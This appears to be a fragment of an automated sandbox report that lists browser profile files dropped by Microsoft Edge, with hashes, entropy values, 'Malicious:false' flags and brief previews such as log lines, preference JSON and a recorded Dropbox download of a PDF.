                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:37.820 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:40:37.831 1e20 Recovering log #3.2024/12/10-12:40:37.840 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1574698967407056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86VXk3+q2P923oH+TcwtpIFUt8OL86WrZmw+OL86EtVkwO923oH+Tcwta/WLJ:7AKv4YebmFUt8OAvr/+OAP5LYebaUJ
                                                                                                                                                                                                                                                                                              MD5:3CB259D27A59A56886D24DA6E37CDD44
                                                                                                                                                                                                                                                                                              SHA1:45AC996A60EA57F9590D59D9E8E41A2138C3B9A8
                                                                                                                                                                                                                                                                                              SHA-256:46B6F08557BAB6873E69D282F70BA6CA3C0C51BEC7FCCE915EB848EBC48968E3
                                                                                                                                                                                                                                                                                              SHA-512:76272BC522AA63E8397CE2ECF0FE59A409C29F04034A70682202115257725CAAAFC2D0924041FFB1818A23090E9704F49D730C9391D67EE8961E13D067C0F10C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.020 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:40:19.125 1d48 Recovering log #3.2024/12/10-12:40:19.138 1d48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1574698967407056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86VXk3+q2P923oH+TcwtpIFUt8OL86WrZmw+OL86EtVkwO923oH+Tcwta/WLJ:7AKv4YebmFUt8OAvr/+OAP5LYebaUJ
                                                                                                                                                                                                                                                                                              MD5:3CB259D27A59A56886D24DA6E37CDD44
                                                                                                                                                                                                                                                                                              SHA1:45AC996A60EA57F9590D59D9E8E41A2138C3B9A8
                                                                                                                                                                                                                                                                                              SHA-256:46B6F08557BAB6873E69D282F70BA6CA3C0C51BEC7FCCE915EB848EBC48968E3
                                                                                                                                                                                                                                                                                              SHA-512:76272BC522AA63E8397CE2ECF0FE59A409C29F04034A70682202115257725CAAAFC2D0924041FFB1818A23090E9704F49D730C9391D67EE8961E13D067C0F10C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.020 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:40:19.125 1d48 Recovering log #3.2024/12/10-12:40:19.138 1d48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0033616753448762224
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:ImtVuAZ+RMkllllll:IiVuAAKktll
                                                                                                                                                                                                                                                                                              MD5:803636E9422FEC29F979EDFEBC6FBC2F
                                                                                                                                                                                                                                                                                              SHA1:EAABF4A7D94E995936D0CB12B28460BFFF0CED1E
                                                                                                                                                                                                                                                                                              SHA-256:0A1F6450F51FF2879B65129C141DEBD06F00EDDC88DCEBD13FD170CDC2A2EB61
                                                                                                                                                                                                                                                                                              SHA-512:AF4A9536B569871FC2666236B30D7F34C92092717881DF99758C7A61B515D323AC87461AECE52A6AFF296909981BC458AA1B82E15A18F99793053C0DFB61BA66
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2651482717873037
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8/2qOB1nxCkMoSAELyKOMq+8yC8F/YfU5m+OlTLVum6V:Bq+n0Jo9ELyKOMq+8y9/Owj
                                                                                                                                                                                                                                                                                              MD5:5328AC2315C2008B564F8BA6D6CB0DD4
                                                                                                                                                                                                                                                                                              SHA1:163DC576E30F664A2CFF034EF79B1F972C9D1CB9
                                                                                                                                                                                                                                                                                              SHA-256:F3C3CA7A5D904E01C1B4D0771C563C68AD589311AD83936E8733412FC525F110
                                                                                                                                                                                                                                                                                              SHA-512:2BCE20972FC45CB800F7A5CEFB3AF8C03049A8B0214045F83941BFEB9EDE40E54AACBCE16A92B3B1C7E904729D98CF6E46B90D878E983CB19AF3888DCB48AA1F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2568
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:BLN/l1l3/PlvB:9//P
                                                                                                                                                                                                                                                                                              MD5:FDC304CA685E019F7B37CE6BB87EDDA6
                                                                                                                                                                                                                                                                                              SHA1:A44DBCAE799F4C2C213A8DFD42571D41770A519A
                                                                                                                                                                                                                                                                                              SHA-256:2742BC7DD6DFB8C6A4412A4D380FFB25C0DCDA827E87627BD604B261CCD4A667
                                                                                                                                                                                                                                                                                              SHA-512:FC5D8965F518E0F8DE640BB1CA56F426B37D3B3E1B2D00AAE96B0AB89445E1D55C985B28654CC7F6EE3E9A8E1532931AF1FEAAAA79D50F6E61365EB3E9DFA8FF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                              MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                              SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                              SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                              SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11755
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13333
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.265991180621583
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:stMPGo4Su4sfgfhOkdbGix6WuOBylaTYG:sOOoPuzgfpdbGixuaTYG
                                                                                                                                                                                                                                                                                              MD5:9F86BDC01445905FC9F04EB55AAC62F3
                                                                                                                                                                                                                                                                                              SHA1:8C545DE1B60B4C36540583E9474F4E7296CC5533
                                                                                                                                                                                                                                                                                              SHA-256:41363EFE3A4C864B8B04D1CBC422F7ADF50E34C828B3B31064E94065E8859E93
                                                                                                                                                                                                                                                                                              SHA-512:0A2CC6B9C5DB2356221DBC6DD719546CB65BD4134406AFF6B5B51B8D7C25A0D21D1239F908A5494446946A4FA712C90E40922F92DEFD8C2BE7DF0FEFCA8CF458
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                              MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.061050455116055224
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Gy0Lx7oI0LxjB89XCChslotGLNl0ml/Vl/Vl/U8oQXmlXCUWls:Cl7ohljBspEjVl/PnvoQW1
                                                                                                                                                                                                                                                                                              MD5:7DA86CF48DB6DE17DAF5C48F40CCF47B
                                                                                                                                                                                                                                                                                              SHA1:0493F2DF846249AF85D1581D4444D9887F37FC27
                                                                                                                                                                                                                                                                                              SHA-256:D145B4DBAFC9FF8B7C0DCE09CD49073F7EC79D785C1D66946DBF3C6899A7ABF6
                                                                                                                                                                                                                                                                                              SHA-512:D47F3D236C024B74AB32FF673B3F3D609BA5977D3D82F5C951799F6FF304123139F57243710A08156C9F498DF5725C3465A474DA2BD205A157778CA9984C3E56
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):119512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7430526958444003
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:jjx7/02b2dNshTNsOO5NsvlNsEuamKngLA:jt7/02b2oMqvQEl
                                                                                                                                                                                                                                                                                              MD5:FF44BB235CC6F81B3B1F33138F66B6F0
                                                                                                                                                                                                                                                                                              SHA1:3407E8DA5EC9F99D6D21C5EEB104EAA5D90EA8D9
                                                                                                                                                                                                                                                                                              SHA-256:A0BF0097DA749CCB25928F7E52F12E01B4485631290DE3AB6A62DFC0CC16DD7D
                                                                                                                                                                                                                                                                                              SHA-512:7A02EB234342CCB482FA1FEBA1B4ECD7AA174D9DB77B4B061ECE41699A4CA89D3F5671C60FA5E531DAEF3A73CCDC2670AF9BDA9DB8D5DD16DA84EA60CB45FCDC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4449
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.961456623789735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:a6JzAD0/2tzcD0/2fquRTezXD0/2L2uIzXD0/2L2uwBz:dgGqiex27x2rz
                                                                                                                                                                                                                                                                                              MD5:42A76926C2AD62D2410E5FEB169E941B
                                                                                                                                                                                                                                                                                              SHA1:C8EA1E07C4E8BEE7F9048DCC7F8687064E999B7C
                                                                                                                                                                                                                                                                                              SHA-256:EB437EDD9451071B31A7AC13FAFD4358A98B3753BFD9DFE3FA89ED78CD8C30F9
                                                                                                                                                                                                                                                                                              SHA-512:3B3DD0AD66141D6FA80666C1AC798E6B639279FA714D16A517E0FA1CDC98A3187E9BB556FF186CC0E6509B2B61D802296010692072DB53AD5EE60C997FA723CD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................HU;...............#38_h.......6.Z..W.F.....i.......i............V.e................'..................021_download,ca6df0a6-27a2-442f-a9af-7fd1128b2fb0......$ca6df0a6-27a2-442f-a9af-7fd1128b2fb0...............="...nhttps://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1...https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4V
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084338938280817
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LrQ+q2P923oH+TcwtfrK+IFUt8OLrgZmw+OLrQVkwO923oH+TcwtfrUeLJ:7Vv4Yeb23FUt8Og/+OI5LYeb3J
                                                                                                                                                                                                                                                                                              MD5:185B5812BCA073F4EB3F8FF97C4B9243
                                                                                                                                                                                                                                                                                              SHA1:DED594D4A87164278D73210A7B3215460A2BCF2A
                                                                                                                                                                                                                                                                                              SHA-256:3B1AAAF701D2F44C074257CEF5B8DC8DE3E501FAEEC3B574D1D52664716F3F2C
                                                                                                                                                                                                                                                                                              SHA-512:77A375AE8104235F2D3F40EAA3484C7F5D7A494603AA3D39B3FC6A1A94F653801ADF0F951A6A0CC5879BACDB26611AC880CE675C4C5D29964460BB21D3BA3BDC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.402 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:40:20.402 1d08 Recovering log #3.2024/12/10-12:40:20.402 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):787
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                              MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                              SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                              SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                              SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.144464220050508
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LjVNAVq2P923oH+TcwtfrzAdIFUt8OL8AgZmw+OL8AIkwO923oH+TcwtfrzILJ:74v4Yeb9FUt8OC/+Ou5LYeb2J
                                                                                                                                                                                                                                                                                              MD5:9D8F0DD1D74B0FEBADB36E0C9C64AEDF
                                                                                                                                                                                                                                                                                              SHA1:0B70701B0A3E04B210E7D107FC61A8BDB86762C6
                                                                                                                                                                                                                                                                                              SHA-256:D7D5FE7B5E8CB2C8A95A2D2EE156B080D880D90AE669C87D9CCE01CA9232F05B
                                                                                                                                                                                                                                                                                              SHA-512:30C32481E6EE8FACAD30F646A856B19A0AA74C1B652BF870A9F03984B9EFE94128B090FC68BD7152D91DA3AAB54644AEBD80F1735D1785C17577B3B93547C6CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.368 1d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:40:20.369 1d40 Recovering log #3.2024/12/10-12:40:20.369 1d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
